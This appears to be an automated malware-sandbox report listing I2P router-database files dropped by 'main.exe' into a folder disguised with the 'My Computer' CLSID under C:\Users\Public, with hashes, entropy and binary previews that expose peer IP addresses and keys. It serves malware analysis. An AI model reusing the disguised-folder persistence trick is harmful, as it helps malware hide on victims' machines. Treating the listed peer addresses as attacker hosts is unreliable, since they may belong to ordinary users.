SHA-512:	482DF9F359C16D98FC2EC2BD5E0819686C2889C6616066650018781178773038DBAAD6E5656E9A03F316BA1160A6157CE797A1635016D826A0F7B1464CA2C94E
Malicious:	false
Preview:	".C..................61n.6.X&.(..u.._~..^"...ZX.\|.&.......Y.a.........?-....f=m.*...P..YWE...0o.n..s-.Y...d..1..I.&.dM\.>~.h..0....?%....E..~.G..0!i...\S.....c..~hYXD........Eu.8.._.2.jf.5.2d....i}Q..Km.y+F}.../.4..e,..0.......@...q..x(..D......g4N..+..xj...@%..069o...!....! L..pv..b...x..y...l_.E....{I4iU.o.).l...T..1..G0......c}.eW(....2`.;....t"P=.V....2'...........................NTCP2.@.caps=.4;.s=,bCOb5nW5J0MUahpr7misIdxvl-OoOx1s70jNJKl9xmA=;.v=.2;..........SSU2.\|.caps=.4;.i=,m1-2XHORsBArkzvhoHMlTpeGS3VE22-s7yHafWoBMlg=;.iexp0=.1726476333;.iexp1=.1726476197;.iexp2=.1726477903;.ih0=,-e0SW5rDvxh2vRCfJNNAUGBy8gYaS-s8Sxze7uFHjkE=;.ih1=,FabXTz-PtSwabxcpI9FcLU6BJSFzV7x6CkkwvLGS9mQ=;.ih2=,Nx141QqTrR6yjU6DWq5avu-uWV-OPTIz1KiS-oAo1V4=;.itag0=.2975717577;.itag1=.2756262787;.itag2=.2847385431;.s=,WT2D1grl4Uk~b1M~9i3VxXc-sZaajQLOHgWNgkc-6Wc=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;WpD..pe'.Am.h..d.?.....0N8'.rB...,8,...h..do...M...jp.i8.{....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rD\routerInfo-d5TfSNs9ITejsDQMgGbkOqkvh~Da-wDDyIINbzMvChg=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	1075
Entropy (8bit):	6.706873012309314
Encrypted:	false
SSDEEP:	24:w/guuuuuuuuuQWGoE4i464IXshkttNitt7s3yf4OiI:EWL5DftGtQ3MpiI
MD5:	9D603547A2DA47F0E34291FB491D0F4C
SHA1:	8C14D90F698050E564A106577EF4D39A96A717FB
SHA-256:	84E8E0A52C0214712FDC3222197706867D1D4C23251804C5EB519373AB5A968D
SHA-512:	7E4553D1E939D3B21A7F77568E6398D5B4EAAB14CA12AE210763834BA48840C99A8B89A6F72CC4EAAD925CFA12A4DAF869CF23E1DCBFE1B378BAB58561AB6942
Malicious:	false
Preview:	...GDy....d....e....8.D7....Np...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$....p...6....&b3....&+.i..R.$......ZF.T'..p{.P=....)._&:....`K............................NTCP2.w.host=.70.113.162.253;.i=.Qcq7tjS5pICwUH-XahWrlA==;.port=.14928;.s=,fY4KYVyWRfsP-u3mboHoflmGRUgP9m09RoXAXkmHHjk=;.v=.2;..........NTCP2.@.caps=.6;.s=,fY4KYVyWRfsP-u3mboHoflmGRUgP9m09RoXAXkmHHjk=;.v=.2;..........SSU2...caps=.BC;.host=.70.113.162.253;.i=,K4~pQ9NVeeIvMI8UAn97jfNgf3-YftHjhKU1ktDKV3g=;.port=.14928;.s=,4vubEkwgUrsULLRW5Xi0~zOhKnt0WIUAMsi~FH1~AUw=;.v=.2;..........SSU2.q.caps=.6;.i=,K4~pQ9NVeeIvMI8UAn97jfNgf3-YftHjhKU1ktDKV3g=;.s=,4vubEkwgUrsULLRW5Xi0~zOhKnt0WIUAMsi~FH1~AUw=;.v=.2;..a.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.8;.netdb.knownRouters=.16946;.router.versi

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rE\routerInfo-EYLrSLd0A~Ou5iMNyEsJkQtukCz812wcn8x4xPDK~3M=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	6.596042142290713
Encrypted:	false
SSDEEP:	24:fxebxWIWvAtqbzOzT4H/VWTNnR8lg7Q7T4qQ/qyX1uQDM44g75:ZeNfIAtQzOT4f+B7Q7T4GyF5
MD5:	422DBF076603C970D188FB6CFF224CD6
SHA1:	4A05A6A47670D9FB3B31F599884205C7CB224B91
SHA-256:	BAF491C7C3E9903EEF0F02707E4381CBF94D5E0EAF92978637C978132F57FF47
SHA-512:	D609C45FC7128228D353119271324722EF4D49F66E1D667FAB482D697EE617E5138D8A90E98C92A0B2ABFC0B9820DFFD888132EA264F3CFD0D3074CDAB37ADA5
Malicious:	false
Preview:	1C.2-3.....N.E.\...7"(~..,.D.qnv~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U~..o..?_9.Q5.rbM...W..g@.a/...U?.1..A,h.`....(.6./."..N.<.>..Z..............P...........NTCP2.@.caps=.4;.s=,HSyCMa4t-OZ8SkfyLJjYZV3pr9amEOSRATlOwY2UrGQ=;.v=.2;..........NTCP2.@.caps=.6;.s=,HSyCMa4t-OZ8SkfyLJjYZV3pr9amEOSRATlOwY2UrGQ=;.v=.2;..........SSU2...caps=.4;.i=,A3a6Cw20EAjttLJYZt03SpC-b8swtC-HfE2ssRJasSY=;.iexp0=.1726474110;.iexp1=.1726475384;.iexp2=.1726474412;.iexp3=.1726477698;.ih0=,vFMVAbeozKm~4bwUa~M39qpa5TKnOT3DqbUVpNyTlGo=;.ih1=,umLaz2jg8xrAm5znU1w4R8DmZbVrtu7MD8f~iRDSkB0=;.ih2=,AwKAc2d1mur1hziBN9y~c~A4hScNyCgiCmbJVgZdZjY=;.ih3=,b~BmfFnXJkyoDdSvrkVdJoy9em3HZ-~PdStXYQwxvhU=;.itag0=.704858649;.itag1=.643458066;.itag2=.29109614;.itag3=.1220873247;.s=,HTwVTqQm

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rE\routerInfo-ElcQfhwBy9mtKzdalfgr5oIRgz-tmm150UBxq57S918=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	815
Entropy (8bit):	7.300877615207222
Encrypted:	false
SSDEEP:	12:ZhvDZU60/Ewbcfegl36aIsouq604YqFZRPBiXQ4QuNmtGgoTiGub8Sjn:H1UEwboTlMwYqFfcHQuNmYTiH8s
MD5:	DCC2897F55173F852A287FC8F3DE9702
SHA1:	F5B3F78EDF142E3D6BFD411F91CD0D5A98ED2F9D
SHA-256:	92FFF27133048E4ADEF195E9FA41C7BD230931CEB7960F0BFC553730A630EC0C
SHA-512:	DA448C1D836AFA2B512FE84C072C547AA75EE97DC85F702C46EEEA73B7E30032E66B8DAD41FBE73B9BDE834B00D528B0882FB685DB37B3E7A40C1860AE255731
Malicious:	false
Preview:	..gU..0..H..FVD.....]H.3.....MiCv.....,.Q...Ua.8...U.X9Z5...?..B&Lp.Q[...1E.SGY.....le*.[.k...90I.i...T...dD..xg.p..$..f...h.m3.r~y.N.Sn...J.#.....jd(.........N...wK'....Ps..X.\;..w......m.N....9..)...@.w..wY.....o<..Q.D...Q.c~..yEb...yAh..9r...~xd6L^....vnp.d.P...p..A(.......JzH`.............}./...wX....^Eh5..."...\,CGF.K......\,>!.1(S`F.....~k......8.j.]...............~...........NTCP2.x.host=.108.227.133.164;.i=.gxQLOXE9yXGYs4urwZAT1Q==;.port=.21344;.s=,zwUPT00e-SV1~oIC5icgOq~JxiytQ5Qz2C-7prW1oEc=;.v=.2;..........SSU2...caps=.BC;.host=.108.227.133.164;.i=,SP1XQ042C-68FyQIQXoJ7DEF3VeXI5Zq2fxVd2qiqhs=;.port=.21344;.s=,gH6SR2oBSwUXk3XdIjnPUTy~klGYwkj7th1beF~kBkg=;.v=.2;..-.caps=.ORD;.netId=.2;.router.version=.0.9.63;.:\......g...Ol..e..:.b(X.]...H.}(D.E.gU.=I#..Fo/)L.+2.A...3.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rE\routerInfo-Eo7xnTDRLKErJzpy1yywMdVA0r4o3k508mpr4FEIqfE=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.695842382334072
Encrypted:	false
SSDEEP:	24:TKzQ6cG6cG6cG6cG6cG6cG6cG6cG6cLxwUZED/xYV9wpZtDzkm:qQ22222222VbGDaybtvd
MD5:	C6B3811FF57198EE2EB2D379772B8FD2
SHA1:	0FEBE86697C715F6EA3B79FE32DA93CB358304EE
SHA-256:	2ACC5501AC3849B52CAE9C63F76818321EADBCF88FECDF5836CAFC47C8F9DADB
SHA-512:	80E9B1DDA6FB55B0744D545BCAE6B2E75B5CD02E7C011DD0BEF9A6B6F6093CD7792B5F301D0B1DB34999899D222A1CED460596F1CAB258B60498A6DAB87EEBCB
Malicious:	false
Preview:	...hx...2>.....s8...A..Wh.sh....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....C....0..i..f....L1#0.....w.....`.I#....C.S.S.*.+.&d..=.....a.E...........$.g............SSU2...caps=.BC;.host=.99.234.18.44;.i=,xOQX~HxIOmjdERdqgaCxBs5vQLa0TW5KK0c2kSWbPpA=;.port=.23154;.s=,U1wZwJNxli4HWKFJTASaQTFmknVDChkMvMNwRPSsGCA=;.v=.2;..........NTCP2.u.host=.99.234.18.44;.i=.goYcMyuaZmu8UnRhCtCl0g==;.port=.23154;.s=,2sOpaWxnkyadFJJemuj9s3vKKsIn7Te9hYFH1oHdUGk=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;d..wky..M..R...W...#:..y.N..i.i.u..~...+.W...Gh"H.....vx..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rE\routerInfo-e-jkj5GzeRho0jlflrONZhkaP218DvSYjr3-qgPyTdU=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	944
Entropy (8bit):	6.617166471162901
Encrypted:	false
SSDEEP:	24:UZxPPPPPPPPPj7AQmc9IwbRZeWfdwbYZeaNt:AVkQmUPZ1Zzt
MD5:	8F0BDC2375F36ED0595876DE3BA6BA13
SHA1:	7CFC16B043304868A3638684D41E67A6BF46C032
SHA-256:	1F233E776B2F4B75E414FF88FA1B55D6793F77BC85E46169DA348579959DB1FD
SHA-512:	27F9664338290F36FE333624A77025CF75AE46746BC3743E73C7976B72578163603A647C9F9CA2715B26B06E19A482916782963E6365DA33551D7EC3D6C4997F
Malicious:	false
Preview:	.6O.RP.....c.{..V-..p.0.@,u*....FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.FW..4.!....M.6..oq.Y.'...!..@2i.)...N.~-D!..6I...`M..W.2..k..............$.-............NTCP2.A.caps=.46;.s=,Sokk5jRBeASWxvAAc-WNE5MFOuMRqvQYpzyBfgOOWVc=;.v=.2;..........SSU2...caps=.BC;.host=.24.231.176.11;.i=,JnRqug65DTcqY~ohqfDnq39X1D6iHQXlOY4v6ljWGhk=;.port=.22951;.s=,3nO9wEy6I7creLY7JfW4B0D8A3q-pI9bCEeIfeniGCA=;.v=.2;..........SSU2...caps=.BC;.host=.2600:6c48:457f:82ff::d73;.i=,JnRqug65DTcqY~ohqfDnq39X1D6iHQXlOY4v6ljWGhk=;.mtu=.1500;.port=.22951;.s=,3nO9wEy6I7creLY7JfW4B0D8A3q-pI9bCEeIfeniGCA=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.62;..unGM.....'XZN...A.D..".}.!.T..~..5......ixTN...O.^cW..W..t.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rE\routerInfo-e0h-kfUKrN6BkJGAyIyTSYXcS4CXa6ZgQbuPf29hpY8=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	868
Entropy (8bit):	6.637628645863643
Encrypted:	false
SSDEEP:	12:70GvxQ555555555CWIVwm7XbNzzf5+CuaKK7LMI6JKgXb9DD:70g1VhjxDs1XbN
MD5:	4924777E6288229B469900FE54B61F44
SHA1:	BE4ECE0F1063DF10D5B5D69C5D3529E41658818F
SHA-256:	70D0CF2D67C92C3854E76AB86A85AAC847009DE9BA7B904E0EAB521C8452DA6E
SHA-512:	8497E1B24F2EA9977539E65CE94A2D09ED88C988C3868343E3C51A01923B1855EC0EE909736FA2145822D6D83C247C278356E668E20C7F1AAC0DA0F6DB15D3A5
Malicious:	false
Preview:	...a....Z.fyy.Gd...0(.!..^>TW=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.W=n6....BZ%........E.1.y,y...:B.)..=.?.....!C.q.....Z.....q...............u...........NTCP2.x.host=.176.109.240.152;.i=.NBqZr22sJjYjE3R5tBrV-A==;.port=.23773;.s=,cVz-5PKO-6zmmnnUR8wMBkbhRTvY0QtLuZRQycNTdlw=;.v=.2;..........SSU2...caps=.BC;.host=.176.109.240.152;.i=,ZNn~qTujC4WTzXobKE3LA-a6SvdN4AmF5Ci9RIRwRjM=;.port=.23773;.s=,M0OinrapPa5TumO58ceQbibPTApVKbG7NkUYEeJJdyI=;.v=.2;..b.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.372;.netdb.knownRouters=.6441;.router.version=.0.9.62;zV!......f.....it.X.oG....]qi?6..5...X.=K..aTH$O.e$...Z.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rF\routerInfo-FAcRyihcVqlAxMCEbxXQe6m1oDwpmwdeR-ck65or-Vg=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	810
Entropy (8bit):	6.658357060992697
Encrypted:	false
SSDEEP:	24:VsxHHHHHHHHHZPB7hBzSdUx0Yn7hzIxgf:VsXP5hBzyUmShzIU
MD5:	45A9098D458B697D9AA5D5141C1269DE
SHA1:	67609865BFAEEE2FB4A474F8718629EB9B89B827
SHA-256:	C328CD7C05519BF8ED7C66529F06D106A207261F738C1A914488EC673B04FD27
SHA-512:	B93A6511E7F876BAA17AD8D5CA1842DD5739A55AA09CBE6EA79787C7E3D832E37148E53869E881CF3F2B306F5B0805AFA46266C6DA48771EED38AA821D1C8AD5
Malicious:	false
Preview:	bG].`....O..p.....'...#2.:.A.NY5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../5....8..id!.......q.%.}./Nq.Y../.x.4....5...h.&<.o[...}%..7+.............$.[Z...........NTCP2.v.host=.106.68.22.241;.i=.tZBuHKwwgvFvLZWo-MvT5A==;.port=.26891;.s=,RuEHGnB6PXFSTNJMpPrHMtjU7yw2Li2ijiZoHidSJww=;.v=.2;..........SSU2...caps=.BC;.host=.106.68.22.241;.i=,vHfDo5tf6LS6Gyf2uRWsQOiQnJlui6-dUqzH76Cs-OU=;.port=.26891;.s=,WhJN-2~40wUXhG-TcVLrXQiceif28eod-FSNEvTYPRc=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;f...N.~...<4,`.......m.;.5.v....2......3.........a.$.v....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rF\routerInfo-FaK3VudikD9t-ju5anshsLjTPWztSE9cTUsP63LK4fc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1297
Entropy (8bit):	6.64516431793234
Encrypted:	false
SSDEEP:	24:UPsyQ9syQ9syQ9syQ9syQ9syQ9syQ9syQ9syQ9syEAjvnOvvMaTRip5auR7RgQ8j:UUyryryryryryryryryryE6nOvTRUMua
MD5:	1B8A13E58E5CD0660B416885AB50063B
SHA1:	EFF004BD92515C40FB07F181E105A087D5512B7F
SHA-256:	12A0F9C4F0375235F185C6C63E4D15602DD2E2A259A061546690943C235B5F50
SHA-512:	360A437D993A3E64E4E23A4E9FBFA30F846CBD0EBCB09B063F30F20CCEEC4C20FF96074650E45C7C7D76258591C42BFA9BE862E3CD5984D23F50B09BFBC11306
Malicious:	false
Preview:	.....^.x'=)x..o............-I!.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.2a1.'3.hD..`..\......X'C.8..U.._. zEP.O...i..-..\|..f#.w...5.P..............%Z...........NTCP2.v.host=.85.239.63.250;.i=.cy2s4cu-Y0fStBFY9nKPtg==;.port=.26748;.s=,oQNBjSNoLi9zVeJysllXGyiSyYdZuZFm4lwZ~5swGW8=;.v=.2;..........NTCP2...host=.2a10:1fc0:7::5698:76d4;.i=.cy2s4cu-Y0fStBFY9nKPtg==;.port=.26748;.s=,oQNBjSNoLi9zVeJysllXGyiSyYdZuZFm4lwZ~5swGW8=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.63.250;.i=,DfFr01751yPzLNoSs6lYshXwYZ96FCIDkc~BjNYgM9U=;.port=.26748;.s=,TOODjw4j7qo4Rs696OjVZOimotWrjqkYSj9I7Y6AKCc=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:7::5698:76d4;.i=,DfFr01751yPzLNoSs6lYshXwYZ96FCIDkc~BjNYgM9U=;.mtu=.1500;.port=.26748;.s=,TOODjw4j7qo4Rs696OjVZOim

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rF\routerInfo-f01zOSp3Y1i3lFkCLNkahxY6tFaP4pL-7wjvQ3Lz2Is=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	6.682953588479811
Encrypted:	false
SSDEEP:	24:kcCeUQhme/rhmdgBidulE4JUczCX6jP5Fs65:jNPhBWAlgmCX6865
MD5:	A2677282FDFADB271F6C58DA1CE2D279
SHA1:	DA836848A5A72EFA514C514DF684038E5C22AC4A
SHA-256:	A8FB9E6572C8A3F66FFD5B7D45F9EBAD13EF0754670F10E1B4F7BE0BF0EF871C
SHA-512:	185CBBA7ADC761199392153B4B3C4AF9813696951963B4B7A7312517000882785655B03E324D89174471CB9603AB92E22B1BD2CE5EEA60CF05599606279B04AD
Malicious:	false
Preview:	M..`.l...(......L[U....p["q...U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D....U.nx.b\|...b..5+.".=....i..D...<8P....<.(.t.%y.F..39...l.RI>0Z.............N_...........NTCP2.v.host=.99.252.228.84;.i=.fVw85r-jzxdDEzEQnxG0kw==;.port=.23131;.s=,aeWngId4mIaElzXT1gj5N-7InC9pWxdU~8WG16Jw-Rk=;.v=.2;..........NTCP2.@.caps=.6;.s=,aeWngId4mIaElzXT1gj5N-7InC9pWxdU~8WG16Jw-Rk=;.v=.2;..........SSU2...caps=.BC;.host=.99.252.228.84;.i=,Gc~uYUvsmHU-qNI5SHVb7VeGi7zIfUDTfD3RsA53Idk=;.port=.23131;.s=,S71ZCFhntkRibiARSEPqqikoRfbCkV0VmW9HCyFgc1M=;.v=.2;..........SSU2...caps=.6;.i=,Gc~uYUvsmHU-qNI5SHVb7VeGi7zIfUDTfD3RsA53Idk=;.iexp0=.1726479861;.iexp1=.1726479867;.iexp2=.1726479886;.ih0=,o~XhUYyr2AsRYAutyWCuPl5iCgW65zMsoKiiAoyY7nM=;.ih1=,FacMecKxFZneIfI1~F80HTO87BjFZ5gh

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rF\routerInfo-f6zHYENW4SpBXwaaD~CyMrMo0XdkUngyGlF~bHzYDLw=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	6.7208360308563995
Encrypted:	false
SSDEEP:	12:heAIHdIHdIHdIHdIHdIHdIHdIHdIHdIGMBNPVSW7YcPVSW7YBSOL/4sDB/L/4sU0:hL888888888ZMBNqcqBSOr4Sr49z2
MD5:	CFB3D05F1B97DD1F7597E92BD10BF2C2
SHA1:	C970C2F98BF87327E8B3789CDB0A207E2E8BAE1E
SHA-256:	4193A779F80B09A4E72AEB14D29D1EAD09819BF44A7F1A4A7F355EF4C22B8F13
SHA-512:	3FC222035B3FF896B44CA9D8AD4430E7E459B3B866AB0746DB6FA5603D0CA7EEB111EDE51D9391E1FC5BFF0A6717BCB5F9DFAE861FAD1C920CA2847D8A4A45D9
Malicious:	false
Preview:	...... ...K.A..........7...K..v..>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m....>B.....l.D.o2....Vx....\_m..5.7..5;e..B..Y...).u.,J.y...\|...............A=...........NTCP2.w.host=.135.181.40.188;.i=.D8W8tvdexrzUIwJFuNzrFg==;.port=.13568;.s=,wm1ZKSVEc8xuRXNZtu~VzO0mEjDLYRQEERsa4fPoPmw=;.v=.2;..........NTCP2.~.host=.2a01:4f9:c012:189f::1;.i=.D8W8tvdexrzUIwJFuNzrFg==;.port=.13568;.s=,wm1ZKSVEc8xuRXNZtu~VzO0mEjDLYRQEERsa4fPoPmw=;.v=.2;..........SSU2...caps=.BC;.host=.135.181.40.188;.i=,G1I3PmKzGhsk15ImwfzfS4BsMwgg7-v1i0tbm9p55-4=;.port=.13568;.s=,B2lG3qKNHdWciqVlQHU9bvCRv-5adp-OtDnetykyn1A=;.v=.2;..........SSU2...caps=.BC;.host=.2a01:4f9:c012:189f::1;.i=,G1I3PmKzGhsk15ImwfzfS4BsMwgg7-v1i0tbm9p55-4=;.mtu=.1500;.port=.13568;.s=,B2lG3qKNHdWciqVlQHU9bvCR

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rG\routerInfo-G1eOUr~6JpdQP9hAnpBe3NZsb3YB1PWhNi6y2rifVx4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1132
Entropy (8bit):	6.715903076035755
Encrypted:	false
SSDEEP:	24:IqCqLqLqLqLqLqLqLqLqLMq+9EIE29QK/QNQVQh8p:IqOt977yKDVQhA
MD5:	6BCE5E57916C95C96DAF6E3B257770BC
SHA1:	3BC4BC5A2F5D955094D063A27C3A1088385F6E7D
SHA-256:	51CAC14DAD448446678B9997AA5CA8244B4150882405A2185EC9C8CE049384FC
SHA-512:	B9AC0BC5D76C30E3052796EA4F5862A28A30E87BD2384B5873878B7B859621DA1C50B98B719E9EAD64BD3B3FA9B2E6EBE68A9AFA48413C66CF65626EE8281BA5
Malicious:	false
Preview:	..w...v.$dQ...P.a.?....bX..S.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.........D.+.m..m..).A,..P.y...lU.I.c..".....\.4..W'kQ.............@&...........NTCP2.u.host=.5.104.75.170;.i=.iBxH3VNQ9vmDrQdCVWE~LA==;.port=.12345;.s=,DzaRVP212EJ1~RTM0-Aeg7c6jRIZ6HtyXydmf9wqKTM=;.v=.2;..........NTCP2.}.host=.2a0f:cdc6:500:5d7::2;.i=.iBxH3VNQ9vmDrQdCVWE~LA==;.port=.12345;.s=,DzaRVP212EJ1~RTM0-Aeg7c6jRIZ6HtyXydmf9wqKTM=;.v=.2;..........SSU2...caps=.BC;.host=.5.104.75.170;.i=,L2DCH0rx2Cfsyqy~H6nGP3wMajb23l3cLngRaAngAgo=;.port=.12345;.s=,Yk04nw8srgK4u8h1rqW1vdlhaZOVo4Sf~WTwg5u6vTo=;.v=.2;..........SSU2...caps=.BC;.host=.2a0f:cdc6:500:5d7::2;.i=,L2DCH0rx2Cfsyqy~H6nGP3wMajb23l3cLngRaAngAgo=;.mtu=.1500;.port=.12345;.s=,Yk04nw8srgK4u8h1rqW1vdlhaZOVo4

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rG\routerInfo-GIEXCb9OkV3aTUpTW1GKBMR5M0uY73Yffw5zi4IE9~A=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1353
Entropy (8bit):	6.674550977947205
Encrypted:	false
SSDEEP:	24:TX1pgGpgGpgGpgGpgGpgGpgGpgGpgGpzX6vtOoghY6hYO8KIpbHbs2gKCBMtI:TTgqgqgqgqgqgqgqgqgqziHkpIKGQ2g1
MD5:	66517FC4EC771984B6105AF4258D6F9B
SHA1:	7CE5DED2073E176F6F5A562021C1EEA3BF159C6E
SHA-256:	81A33E94A5FDBDFF624D7F1130689C4D4F520A0A65B7E2D1B37FB4BB228A8166
SHA-512:	8DDFA8E4882196F0831D4E76A61EA7DFCD472D4E700F10854CCBEE6BAE9906F350258F431FB7C26889088BE58CC3FE7178B0BCF49F7539B2339DBC71F82D6882
Malicious:	false
Preview:	r.@...A..<....z......'j .n..^.J\|...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+...2-.0...=..=Jf.Obky......+g......TYn.K.....w>\|.....O{..:a.........................NTCP2.w.host=.184.65.173.183;.i=.LhJaOvR98fYEkUoc3KXBlQ==;.port=.11171;.s=,3TAI5XG87ozsQmFHH6YsEfoeYWumeQSwiPSQUEizQEY=;.v=.2;..........NTCP2.@.caps=.6;.s=,3TAI5XG87ozsQmFHH6YsEfoeYWumeQSwiPSQUEizQEY=;.v=.2;..........SSU2...caps=.BC;.host=.184.65.173.183;.i=,L1NDJeQrknxi0IjUM-swDuY2ognl3I~ORS~193r~N3k=;.port=.11171;.s=,7YoYxjX3Ve9MFUJZ9Gb8gk-XzOs0XCBt5TMEg5M30zk=;.v=.2;..........SSU2...caps=.6;.i=,L1NDJeQrknxi0IjUM-swDuY2ognl3I~ORS~193r~N3k=;.iexp0=.1726479938;.iexp1=.1726479962;.iexp2=.1726480323;.ih0=,AHoMVrW9Aed3q2yKryB0DIFBpMi9vYzq61l4AdBgK5A=;.ih1=,u6yHZa5jb5ibt3RTMcrT~KjY